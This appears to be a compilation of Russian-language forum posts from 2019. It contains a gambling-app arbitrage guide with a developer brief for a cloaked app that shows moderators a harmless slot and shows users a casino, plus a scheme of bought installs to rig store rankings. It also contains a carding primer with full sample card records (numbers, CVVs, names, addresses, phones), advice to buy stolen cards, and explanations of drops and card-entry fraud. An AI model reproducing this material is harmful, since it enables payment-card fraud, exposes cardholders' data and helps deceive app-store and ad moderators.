B) Продвигаем приложение по ключевым словам в Гугл плей/аппстор, занимаем 1-3 позиции и получаем органический трафик (считай контекст) тех людей кто ищет казино запросы в поиске. Вообще необходимо составлять ASO, ключи по которым будете продвигаться, включать их гармонично в описание, либо добавлять их за счет отзывов (типо юзер часто пишет этот ключевик к отзыву на ваше приложение, после чего оно начинает высвечиваться в поиске по этому ключу.)

P.S Вообще если говорить про текущую ситуацию на рынке я не вижу совсем тех, кто продвигается по ключам… либо это происходит очень быстро, их молниеностно выпиливают, эту информацию скорее написал для тех, кто планирует и в других вертикалях полить траф.

После того как ваша прилка находится в поиске по определенному ключу, чтобы поставить ее на позиции выше Вам необходимо закупать на нее мотив инсталлы + хорошим плюсом был бы одновременный слив с фб живого трафа, мотив инсталлы покупать тут:

СПИСОК сервисов мотив инсталлов:

Допустим вы хотите продвинутся по ключу "Вулкан'' , вы идите в эти сервисы и заказываете установки пользователей по этому ключу. Будет выглядеть следующим образом: пользователь получает задание ввести в гугл плее в поиске ключ вулкан, после чего найти ваше приложение, установить его, поиграть 1 минуту, оставить комментарий, после чего зайти на второй, третий день. Наши рекомендации по тому сколько инсталлов мотивированных на ключ надо заливать: тут четких цифр нет, вы придете к ним когда начнете тестировать. Следите за конкуренцией по этому ключу, если там почти нет приложений, значит конкуренция маленькая и достаточно залить в первый день 50 инсталлов, второй 100, третий 150, четвертный 200. Если большая то счет может и на 1000 в день с кратным дальнейшим увеличением. Отлили 4 дня, смотрите как меняются позиции от этого и решайте как пушить дальше. Есть разные стратегии заливки мотивированных инсталлов на приложение, их можно почитать в интернете, рекомендовать не будем, т.к все меняется каждый день в гугл плее, мы дали инструмент и базис, далее ваши мозги вытащат вас на максимальный профит.

Какие офферы лучше всего идут через мобильные приложения:

ССколько же зарабатывают вебы сливающие трафик на мобильные приложения?

Т.к команда Gambling.pro сама сливает с данного источника мы просто покажем Вам цифры с этих двух рекламных источников:

1) Слив на приложение с Таргета фб и др. источников:

В стате более 87540$, на покупку трафа у нас ушло около 40к$ (скрины уже не достать кабинеты в блоке), чистый профит около 47к$ = 3 млн рублей

2) Органику мы достаточно давно не льем, в силу быстрых банов, но в свое время удавалось вынимать до 300к дейли , было это где-то пол года назад.

Чего нельзя делать при работе с приложениями! ВАЖНО! А также как правильно выстроить работу моб. приложения:

Теперь расскажем еще более детально, а также углубимся в процесс, как сделать работу с приложением максимально комфортным и максимально профитным, рассмотрим на примере:

Вы залили приложение, льете на вулкан платинум (стоит ваша персональная ссылка на него) вы отлили 30 депов, ждете рассмотрения для Вас персональной ставки, а в это время решили затестить наш приватный оффер вулкан клуб с чистой базой, зашли в gambling.pro, получили ссылку, вставили себе на сервер вместо вулкан платинум, теперь льется на вулкан клуб. Так вот в таком случае получается, что те кто регался и вносил депозит на вулкан платинум зайдут в приложение и не увидят своего кабинета и денег, потому что им будет открываться совершенно другое казино, как результат они не смогут отыграть деньги которые вложили, не смогут внести новые депозиты там, а как следствие качество вашего трафа будет ужасное и рекламодатель и вовсе может отказаться платить, либо сделает очень низкую ставку. Поэтому, чтобы такой проблемы не было и вы могли в одном приложении тестировать сколько угодно казиношек без потери качества делайте следующее:

Человек заходит в приложение, в этот момент отправляется запрос на сервер с id устройства (подставляете в ссылку параметр ID устройства юзера запустившего приложение). На сервере идет проверка (процесс клоаки рассмотрим чуть позже) на предмет того модератор пришел или обычный пользователь. Если все ок - обратно передается урл с казино например и он показывается в вебвью, если определили что это модератор показывается заглушка. Если показывается ссылка - в базе мы сохраняем, какому устройству какой урл показывать дальше ( по id который передавали в ссылке ). Тем самым если юзер один раз увидел определенное казино, то потом всегда когда он будет возвращаться в приложение он будет всегда видеть только это казино, а следовательно сможет играть и вносить деньги, что сделает ваш качественным, с которым можно расчитывать на повышение ставки. Такой способ позволяет в рамках одного приложения делать сплит тест сразу нескольких офферов, без потери качества трафа.

Проблемы с которыми вы столкнетесь по мере работы и как их решать:

0) Где найти разработчика, который сделает мобильное приложение и как правильно ему написать ТЗ?

Как решать:

Создав задание на FL.ru или WorkZilla очень низкий шанс найти хорошего разработчика за маленькие деньги. Все ломят цены и сроки до 10 раз.

Самые идеальные варианты:

- Зайти на тот же FL или Weblancer.net, перейти в архив фрилансеров в папку - мобильные разработчики и отписать каждому в скайп/телеграм предложение. (можно использовать подобные сервисы где есть каталог фрилансеров с возможностью сортировки по специальностям)

- Искать людей в тематических сообществах ВК и писать им в личку.

- Вбейте в поиске ВК - Мобильный разработчик / Разработчик android приложений / Разработчик ios приложений (и другие подобные ключи) Выдача будет овер 1млн постов как от пабликов так и от конкретных людей. Некоторые посты связан с поиском работы, по некоторым постам из комментариев можно вычислить разраба. (Этим способом мы нашли 4х разработчиков за 2 часа поисков которые сразу приступили к выполнению заказов)

Примерный текст заказа:

Добрый день Иван, есть проект, возможно вам будет интересно.

Сделать приложение под андроид с такой логикой:

Определенным людям будет открыться встроенный браузер (вебвью) с сайтом, а всем остальным будет открываться игровой слот / рулетка, встроенная в само приложение.

Решать кому что показывать можно реализовать 2мя вариантами.

1 - При открытии приложения оно будет отправлять запрос на сервер, который будет проверять человека по следующим данным:

- ip (из какой страны заходят, прокси это или нет)

- часовой пояс устройства (если часовой пояс не российский - показываем игровой слот в приложении.)

- Модель устройства (если заходят с телефона google pixel - показываем игровой слот, так как обычно с таких телефонов сидят модераторы)

После чего сервер будет отвечать приложению либо показывать слот либо какую ссылку открывать во встроенном браузере (вебвью)

2 - Все тоже самое делаем в самом приложении.

Исполнители запросят у Вас тз на саму заглушку, что она из себя должна предоставлять, мы любезно готовы дать вам прописанное наше ТЗ на заглушку, если вы в благодарность за потраченное нами на написание данного мануала время сделаете репост себе на страницу.

Кардинг

rei — Wed, 11 Dec 2019 12:25:34 GMT

СС это Credit card.

VISA

Eurocard/Mastercard

JCB

DinersClub International

DinersClub valid in Russia

American Express

Visa Electron

Eurocard/Mastercard Cirrus/Maestro

VISA

- на карте VISA после даты окончания действия карты изображен значок “V” такой же как первая буква логотипа;

- Начальная цифра Visa – 4

- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода

Eurocard/Mastercard

- на карте Eurocard/Mastercard после даты окончания действия карты изображен значок MC

- Начальная цифра Eurocard/Mastercard - 5

- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода

JCB

- на карте JCB после даты окончания действия карты изображен значок "J" или “звездочка JCB”

- Начальная цифра JCB - 35

DinersClub

- на карте DinersClub после даты окончания действия карты изображен логотип круг с вертикальной чертой

- Начальные цифры DinersClub - 30, 36, 38, 39

- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода

- На лицевой стороне справа две буквы секретного кода

American Express

- Начальная цифра AmericanExpress - 37

- существуют карты Centurion, Corporate, Optima и Hertz

Необходимые Вам данные для кардинга:

CC number

CVC

EXP

First name

Last name

Street, house number

Sity

Country

State

Zip

Phone number

Credit card - это кредитная карта, у нас же имеется необходимая инфа с неё, она же называется сс, картон, картошка, карты и т.д

Давайте разберемся как примерно выглядят сс инфо трёх самых необходимых и популярных стран. (USA/UK/DE)

Мы не разбираем full info, т.е. ничего дополнительного, только основное.

USA (United States):

5256502253097617 - Сам номер сс (credit card num)

0910 - exp (срок действия карты) 09 месяц 10 год

502 - cvv (секретный код)

Jorge Bailon - имя хранителя карты (cardholder name)

15760 SW 69 ld - улица (street)

miami - город (city)

FL - штат (state)

33193 - зип код (zip code)

US - страна (coutry)

3055051991 - номер телефона (phone num)

VISA - тип карты (type)

К USA сс еще можно добавить SSN, DL, MMN, DOB, credit report и т.д. и т.п.

UK (United Kingdom):

5178057252945584 - cc num

1211 - exp

849 - cvv

Feiyue Ma - cardholder name

8 Wilberforce Road - street

Norwich - city

NFK - это королевство, штат, графство и т.д (county)

GB - country

NR5 8ND - zip code

07883894260 - phone num

Master Card - type

В ЮК как правило берут только DOB как дополнительное инфо. Еще иногда sort code (код сортировки сс), эта инфа нужна

для обхода вбв (verified by visa).

DE (Deutschland):

4344990165183012 - cc num

1112 - exp

830 - cvv

Visa - type

Alexander Reitzenstein - cardholder name

Wichertstrase 38a - street

Berlin - city

10439 - zip-code

030/20055321 - phone num

Deutschland - coutry

В Германии как правило при вбв спрашивает DOB, штатов нету.

Первое, что начинающий кардер должен изучить, так это конечно же информацию о кредитных картах, проще говоря картон / СС.

И так, приступим.

Первым делом нам нужно найти картон. Самый простой вариант это купить его у продавца. При покупки вы получите картон примерно в таком формате:

4306651004564350 | 10/10 | 826 | Richard Lang | 56 Groveview Cir | Rochester | 14612| NY | USA | 661-298-0881

(Формат у каждого продавца бывает разным)

• 4306651004564350 - Номер кредитной карты.

• 10/10 ( 10 месяц / 10 год,) - Дата окончания действия карты.

• 826 - Защитный код карты CVV/CVV2

• Richard Lang – First и Last Name (Имя, Фамилия)

• 56 Groveview Cir – Адрес

• Rochester – Город

• 14612 – Zip code (зип)

• NY (New York) – Штат

• USA – Страна

• 661-298-0881 - Телефон

За дополнительные $ вы можете пробить дополнительную информацию:

Данные пункты пробиваются в основном для создания Enroll'a, поэтому если вас интересует просто вбив, то они вам скорее всего не понадобятся.

• DOB - дата рождения

• SSN - номер социального страхования

• MMN - Mothers Middle Name (отчество матери, так сказать)

Теперь немного конкретизации, касательно каждого вида карты:

Visa

• Номера кредиток Visa начинаются с цифры 4

• Имеется защита под названием Verified by Visa (VBV)

• 3х значный CVV код

Verified by Visa - уникальная услуга, в которой личный пароль или идентификационная информация используются для защиты номеров карт Visa от несанкционированного использования. Проще говоря у холдера есть код который он должен будет ввести при покупки чего либо.

MasterCard

• Номера кредиток MasterCard начинаются с цифры 5

• Имеется защита под названием MasterCard SecureCode (MCSC)

• 3х значный CVV код

MasterCard SecureCode - принцип работы тот же, что и у VBV.

American Express

• Номера кредиток American Express начинаются с цифры 3

• 4х значный CVV код

Discover

• Номера кредиток Discover начинаются с цифры 6

• 3х значный CVV код

Как определить Zip / Штат / Телефон

1) Заходим на сайт zipcodes.addresses.com/zip_code_lookup.php

(Например, у нас есть город и зип, как определить штат?|Summerville|30747|United States

2) Вбивем город в поле City и выбираем первый попавшийся штат. (допустим это будет GA)

3) Далее нам выводится результат, где мы сверяем Zip тот что указан в картоне и где указано поле ZIP COD на сайте.

4) Как мы видим Зипы совпали а значит наш штат это GA

5) Так же в поле AREA CODE указаны первые три цифры телефона штата

Bin - первые 6-ть цифр в номере кредитной карты, индификатор банка который выдал карту.

Например карта 4306651004564350, где 430665 - номер банка который выдал карту:

Wescom C.U. DEBIT CLASSIC USA Pasadena California CA

сайтик для пробива:

http://www.anonym.to/?http://www.binchecker.com/

Вот тут ещё на крайняк:

http://www.anonym.to/?http://en.wikipedia.org/wiki/List_of_Bank_Identification_Numbers

Часто задаваемые вопросы новичков

Q: Что такое креды,CC,картон и т.д.?

A: Это и есть кредитные карты, именно благодаря им существуем мы.

Q: Где можно достать кредитную карту?

A: Способов конечно много, от банальной кражи до взлома интернет магазина, но на данном этапе я бы посоветовал вам незаморачиваться и просто купить их у известных людей на данном форуме.

Q: Что такое фрауд?

A: В переводе с английского "мошенничество", в принципе перевод полностью отображает значение этого термина.

Q: Что такое эмитент?

A: Это банк который выпустил саму кредитную карту, узнать название банка который эмитировал карту можно с помощью программы CC2Bank

Q: Что такой бин?

A: Бин это первые 4 или 6 символов в номере кредитной карты, именно пониму и узнают что за банк эмитирует кредитную карту, а также тип карты.

Q: Что такое CVV/CVV2 код?

A: Это 3-4 дополнительные цифры, призванные улучшить защиту кредитных карт, в данный момент очень тяжело найти места где бы принимали карты без CVV.

Q: Как выглядит информация по кредитной карте?

A: Подробнее об этом вы можете узнать здесь

Q: Что такое карты с Full Info и зачем они нужны?

A: Это информация по кредитной карте включающая в себя по мимо стандартных данных еще и SSN, DOB, PIN, MMN и т.д. Такая информация нужна в тех случаях когда требуются более полные данные по держателю карты (например при энроле) или обнале.

Q: Кто такой дроп?

A: Это человек принимающий на своё имя какой либо скарженый тобой товар, после чего он пересылает его тебе или другому дропу (вообще тут бывают разные варианты). Чаще всего дропы не знают что они принимают украденные вещи и рано или поздно за ними придут копы.

Q: Кто такой вбивальшик?

A: Это человек который занимается вбивом информации по кредитной карте в какой нибудь магазин, от него во много зависит удачный исход всей операции. Подробнее о том что это такое вы можете узнать здесь.

Q: Примерно сколько получает вбивальщик за свою работу?

A: Ну это все зависет от того как вы договаритесь со своим работадателем, чей будет расходный материал (карты, прокси и т.д.) и какова сложность работы. В среднем за вбив платят от $2 до $5.

Q: Я снял с карты около $50-$100 станут ли меня искать за эти деньги?

A: По идеи конечно вас должны будут искать, но на практике это бессмыслено, т.к. ваши поиски выльются в более крупные суммы.

Q: Что такое PayPal или палка?

A: Очень популярна онлайновая система оплаты различных услуг в USA, имеется возможность пополнения аккаунта с помощью кредитной карты.

Q: Вы не могли бы подсказать шопы которые 100% шлют товар?

A: Нет, это информация представляет собой определённую ценность и просто так вам никто не подскажет шоп который 100% шлёт товар.

Q: Что такое tracking number или трэк?

A: После того как ты заказал в шопе товар его высылают на дропа с помощью почты или курьерской службы. Самые известные из этих служб UPS, FedEx, AirBorne и т.д. Так вот после того как товар будет выслан тебе выдаётся этот самый трэк, с помощью которого на сайте курьерской службы ты и можешь узнать где в данный момент находится посылка.

Q: Как мне перевести деньги с кредитной карты на WM?

A: Никаких способов напрямую перевести деньги с кредитной карты на WebMoney несуществует.

Q: Вот я нашел сайт, там продавали кредитные карты, которые надо только обналичить в банкомате. Отправил им деньги, а меня кинули. Можете посоветовать мне такие сервисы?

A: Нет. Все, кто предлагает подобные карты (d+p - дамп плюс пин, записанный карты и вообще дамп плюс пин) кидалы 100%. Такой материал никогда не выставляется на продажу, так как нет смысла продавать его, когда можно снять деньги самостоятельно или отдать на обнал его более сведущим и знакомым людям.

Способ от подписчика Желтого веба по сохранению лидов в Google Form, может пригодиться.

rei — Wed, 11 Dec 2019 12:16:13 GMT

Привет!) Колхозный метод, если нет БД или не хотим платить за CRM😉

Регистрируем Google почту
Переходим гугл формы
Нажимаем сюда

Заполняем, в нашем случаем Имя и Телефон, выбираем «Текст (строка)»

Переходим на вкладку ответы и нажимаем «Создать таблицу», название можете оставить по умолчанию или поменять. У вас откроется таблица, куда будут приходить лиды.

Возвращаемся к редактированию формы, нажимаем

заполняем форму и смотрим появилась запись в таблице или нет, если да идем, дальше если нет повторить 5-6 пункт.

Снова возвращаемся к редактированию формы, нажимаем

Теперь копируем URL адрес куда нить, например в Блокнот

Копируем значение атрибутов “name” нужных нам полей, в нашем случае Имя (entry.70414526) и Телефон (entry.1393739064) и сохраняем их тоже в Блокнот.

Теперь добавляем в файл, который у вас обрабатывает лиды данный код:

$url = ' /formResponse'; $data = array(); $data[‘NAME_FORM’] = $_REQUEST["name"]; $data[‘PHONE_FORM’] = $_REQUEST["phone"]; $data = http_build_query($data); $options = array( 'http' => array( 'header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => $data, ), ); $context = stream_context_create($options); $resultgd = file_get_contents($url, false, $context);

В переменную url вставляем ссылку на форму, только надо удалить /viewform, в нашем случаем будет выглядить так: $url = ' https://docs.google.com/forms/d/e/1FAIpQLSdlQHXzEPElAFWqf0euqx4ba0Qc_QRgVQlo994ZfTQ9U7FKQA/formResponse';

Так же надо заменить NAME_FORM и PHONE_FORM на значение полей, которые мы сохранили в блокнот, в нашем случаем будет выглядеть так:

$data[‘entry.70414526’] = $_REQUEST["name"];

$data[‘entry.1393739064’] = $_REQUEST["phone"];

Радуемся и пользуемся, теперь лиды буду отстукивать и в таблицу, где с ними будет удобнее работать.

З.Ы. Бывает, что в таблице создается новый лист (снизу).

Арбитраж трафика)Приложения казино

rei — Wed, 11 Dec 2019 12:09:00 GMT

Кейс-мануал ФБ + Моб. приложения казино. Быстрый запуск. ROI 100%

Деньги в арбитраже? Изи-изи, рилток! Синк эбаут ит…

ОСТОРОЖНО! Повторив все действия из статьи можно случайно слить в плюс и умереть от радости...

Привет друзья! Хочу порадовать вас новым кейсом по сливу трафика с FaceBook на мобильные приложения гембл)) Подход не новый, и нас уже есть максимально подробный и исчерпывающий кейс, который писал Артем, но разбирая вчера свою личку я поняла, что есть необходимость написать еще один кейсик, чуть покороче, и разобрать там немного другие рабочие моменты… Скоро поймете о чем я :)

Артем рассказывал в основном о технической составляющей создания приложений, заливания их в сторы, отсеивания модераторов и т.п., я же хочу поговорить о том как запустить РК в ФБ и начать уже наконец-то получать бабки :D Точнее даже так: я уже запустила не одну такую РК в ФБ и сейчас я просто распишу алгоритм, как я это сделала и начала зарабатывать. Возможно это будет первый в арбитраже кейс, который можно повторить “точь в точь”...:D

Наверное даже если мозг не включать +/- в 0 получится сработать.

Итак, приступиммм!!!

Перед тем, как запускать траф я подошла к своим же аффам и спросила у них:

“Че там по прилам, чуваки?”

И это и есть первый пункт моего алгоритма:

Пишем по одному из удобных контактов аффилейт менеджеру:

наш лорд Affiliate Максим:

— Вконтакте - https://vk.com/gamblingpromax

— Телеграм - @GamblingProMax

— Скайп - maxaffilate@gambling.pro

или

рыцарь Affiliate Стас:

— Вконтакте - https://vk.com/gamblingstas

— Телеграм - @GamblingproStas

— Скайп - live:gamble1more

и уточняем следующие вопросы: 1) Есть ли сейчас мобильные приложения в наличии? 2) На какие офферы? 3) Какие условия по выплате, KPI, лимитам, холду? Что надо сделать, чтобы начать работать с сиим чудом?

После того, как контакт с аффилейтом налажен и процесс обменом информацией пошел, вы быстро, так же как и я, выясните, что в GAMBLING.PRO появилось новое мобильное приложение - Fresh Casino (Россия), со стартовой ставкой 3100 рублей за минимальный депозит. Неплохо.

Ну и еще узнаете, что если очень захотеть, то мы можем для вас любой оффер, который подойдет под ваш запрос, засунуть в мобильное приложение.

P.S. У меня никаких специфических запросов не было, меня и фреш вполне устроил, потому что оффер этот я давно знаю и он один из моих любимых.

Ну как давно - относительно давно) уже месяцев 4-5, можно сказать с момента его появления. Этот оффер очень свежий, от того и конверт на нем такой хороший. Но чисто на будущее скажу - в приложения мы всегда зашиваем только топовые офферы, так что не сомневайтесь и берите что дают, у нас ошибки исключены :)

Короче я лично выбирать и заморачиваться поленилась, взяла, как и вам советую, что было/дали. Моя цель - делать мало и получать много, поэтому у меня вообще стиль жизни такой, что я лишних телодвижений без особой на то необходимости стараюсь не совершать))

Далее…

После того как с оффером вы разобрались (не без помощи наших про-аффилейтов), надо уже потихонечку приступать к настройке РК. Лить мы с вами будем с фейсбука. Если вы никогда не лили с фейсбука и вас напугала фраза “лить мы будем с фейсбука” - не пугайтесь. Мне похуй, но к концу прочтения этой статьи, если вы повторите все пункты, вы будете, сука, лить с фейсбука, даже если раньше никогда не делали этого…:D

2. Заходим на https://www.facebook.com , логинимся в свой аккаунт.

3. В процессе общения, наши аффилейты должны отправить вам инструкцию к выбранному приложению. Мне отправили вот такую - https://docs.google.com/document/d/1z8M07Na9yOqMK1bWtpSZsmnJz0u_iUVzFu-IP6xz2tI/edit?usp=sharing.

Я внимательно ее изучила и сделала следующее: 1) приняла соглашение ФБ (кликнула там по ссылке и нажала “принять”), 2) запросила у менеджера мой диплинк.

4. Возвращаемся в фейсбук, заходим в раздел “создать рекламу” и попадаем в ADS manager.

Реквизиты

И видим перед собой вот это… WTFBLYAD О________________________о

Реквизиты

5. Цель рекламной кампании - Установки приложения

Реквизиты

6. Задаем имя РК, жмем кнопку “создать” или “продолжить” или что-то такое… Она там одна, не ошибетесь. И попадаете на экран создания группы объявлений. Выглядит он так:

Реквизиты

Как вы уже могли заметить, тут ФБ у нас сразу же интересуется - куда это мы собираемся направлять траф-то??? В гугл плей или апп стор?

7. Мы с вами собираемся отправлять трафик на прилку в гугл плей, поэтому вы выбираете соответствующий пункт списка, выбирайте приложение которое вам расшарил менедже (оно уже будет в списке) и вперед.

Реквизиты

8. Динамические креативы - пропускаем. Сразу едем к блоку “Аудитория”. По умолчанию вы сразу создаете новую. Выставляете настройки как на скрине:

Реквизиты

Жмете “Сохранить аудиторию”.

Реквизиты

P.S. Детальный таргетинг, связи и т.п. пропускаете - кроме увеличения стоимости клика вам это нихера не даст.

Едем дальше.

9. Плейсменты

Тут у нас есть два варианта, как мы сами работаем:

1.Оставляем автоматические плейсменты и ФБ сам выбирает где ему откручиваться. Вариант, из серии “могу себе позволить”

Реквизиты

2.Задаем плейсменты вручную. Если оборотки не так много и тестировать все и вся мы не хотим. Тогда выбираем их следующим образом:

Реквизиты

Сториз пока что перестали использовать, потому что траф с них стал дороже, а конверсия ниже.

10. Бюджет РК

Дневной бюджет на период тестирования 50-100% стоимости депозита на каждый плейсмент - то есть 2000-4000 рублей.

Реквизиты

11. Остальные настройки

Ставим как на скрине и не вникаем.

Реквизиты

Нажимаем кнопку “Продолжить” и едем дальше.

12. Создание объявлений

“Вот тут мы покреативим!”... (нет)

Сервисы, которые лично я использую для поиска креативов:

НИКАКИЕ! Я или придумываю крео сама, так как у меня достаточно опыта для этого, или… У меня есть одна приватная метода. Ее мы родили совместным брейнстормом, вместе с нашими аффами)

Я поделюсь ей с теми, кто сделает репост этого поста (инструкцию, как получить мой приватный мануал по поиску и скачиванию крео из инсты - смотри в конце этой статьи)

Еще, по быстренькому примеры креативов вы можете подсмотреть в:

advancets.org — тут не так давно появился функционал, который мониторит посты из ленты ФБ и инсты.
И еще в publer.pro — в котором тоже можно подглядеть, что сейчас откручивают в инста постах.

И есть еще один сервис в котором можно поискать креативы, о котором мало кто знает - ссылку на него я тоже отдам только тем, кто сделает репост моего поста :Р

Для этого вы можете вбивать в поиск такие запросы как:

Выигрыш
Вывод
Качай
Бонус
Поднять
Баланс
Депозит
Фриспин

Я проделала все это на примере Publer. Заходим сюда.

Реквизиты

В результате за 10 минут я нашла вот такие вот, более или менее адекватные в плане посыла и отсутствия мислида, посты:

Реквизиты

Эти посты понравились мне тем, что в них перечислены сразу все выгоды и преимущества для игроков клуба, есть халява-триггер “подарок” и колл-ту-экшен присутствует - банально, но есть все шансы на то, что такие посты сконвертят :)

Реквизиты

Здесь, в посте слева, мне понравилось 1) видео с мужиком, который по сути является ярким представителем ЦА казино - работяга, 30+, женат, то есть вероятность того, что на пост среагируют такие же мужики - довольно высока и это хорошо)) + эмоциональная подача в тексте “Сумасшедшие выигрыши!”, “Классные игры!” - может показаться, что тупо, но это всегда работает. Надо использовать в своих текстах такие слова, которые вызывают у людей эмоциональный отклик и тогда они будут читать ваши посты до конца и реагировать на их содержание конверсиями :)

Во втором посте мне понравилось то, что есть триггеры “Новинка” и “щедрые слоты”. Вообще больше всего мне тут и понравилось слово “щедрый”, потому что я считаю это одним из наиболее важных требований лудоманов к слотам - чтобы они давали!!!)) Да и побольше…:D

Ну и в обоих постах есть колл-ту-экшен, что тоже очень хорошо.

Реквизиты

Вот это вот два поста тоже заинтересовали меня несколькими моментами 1) В первом есть дедлайн, 2) Во втором есть сумма заработка и сошал пруф в виде отсылки к другим людям, которые установили приложение… )))

12. Когда мы нашли примеры постов, которые нас устраивают - нам надо их уникализировать. Просто скачать из паблера (или еще откуда бы то ни было) картинки/видео, которые уже крутились/крутятся в ФБ и снова залить их в ФБ со своего аккаунта - нельзя, это 100% бан.

Для того, чтобы уникализировать картинку или видео, достаточно сделать следующее (одно из или все сразу) 1) наложить на видлео визуальный фильтр 2) наложить другой звук 3) поменять местами фрагменты 4) обрезать/удлинить видео. В общем надо произвести с ним какие-то манипуляции, которые изменят его характеристики и сделает его уже другим видео для ФБ ))

Все это можно сделать с помощью Adobe Premiere, либо с помощью любого другого, удобного для вас видео-редактора, который вы самостоятельно откроете для себя с помощью Google…:D

13. Когда вы уникализируете подобранные видео - можно возвращаться в ФБ и продолжать настройку РК. Выбираем “одно изображение или видео” и заливаем наш крео.

Реквизиты

14. Когда видео загружено, приступаем к финальному этапу настройки нашей РК

Добавляем:

Текст объявления
Заголовок (для Audience Network)
Призыв к действию - “Установить” / “Скачать” (мы чаще используем “Скачать”)

P.S. В разных плейсментах кнопка “Скачать” находится с разных сторон, поэтому в идеале нужно адаптировать крео под эти условия. Посмотреть все варианты расположения кнопки призыва к действию в разных плейсментах вы сможете в окошке предпросмотра рекламы.

4.Отложенный надо диплинк заранее получить у менеджера нашей сети и вставить в соответствующее поле

Лайфхак - если после загрузки креатива появилось сообщение:

Реквизиты

Сделать это можно вот тут, нажав на кнопку “индивидуальное оформление”:

Реквизиты

5.Расширенные настройки не трогаем

6.Проверяем чтобы объявление нормально выглядело во всех плейсментах

Реквизиты

Жмем кнопку

Реквизиты

ТА-ДА-ТА-ДА-ТА-ДА-М-М-М-МММММ!!!1

Поздравляю, бро, твоя РК готова, скоро она запустится. Теперь самый последний штрих.

Мы же с тобой не дауны грузить одно объявление и ждать чуда, поэтому, чтобы наши тесты были репрезентативными, давай сделаем следующее:

Копируй объявление 2 раза и делай еще несколько вариантов постов (2 уникализированных видео + текст)

Реквизиты

2.Меняй в настройках объявления видео и текст, и подтверждай их.

Реквизиты

Вот теперь все, сиди на опе ровно и жди пока пройдет модерация и пойдут первые клики.

15. Как мы тестируем объявления и адсеты, анализируем происходящее, отключаем неэффективные объявления и масштабируемся - мы уже подробно описали в статье о том, как лить на инсталлы в плюс. Дабы не повторяться, просто приведу ссылку на нее - https://vk.com/@gamblingpro-manual-kak-lit-za-instally-v-plus

По итогу четырех дней слива таким методом:

Реквизиты

РК в ФБ постоянно удаляются, но мне удалось откопать одну более или менее приличную для этого примера.

10 603,9 руб потрачено
258 установок получено
41,1 рубля за установку

Конверт из инсталла в регистрацию скакал от 1 к 5 до 1 к 9, в среднем 1 к 6. Всего получено 43 регистрации и 6 депозитов.

Реквизиты

Ставка за депозит 50$,
Всего я заработала 300$, потратив при этом около 160$ (10603 / 65 по среднему курсу $)

Невооруженным глазом можно заметить ROI около 100% ))))))) 10к рубасов за 4 дня, для новичка это был бы отличный результат! За месяц таким макаром можно поднять 100-150к рублей, особо при этом не напрягаясь.

Повторив 14 пунктов моей инструкции и прочитав мануал по ссылке выше - ты тоже сможешь запустить РК в ФБ и заработать свои деньги :)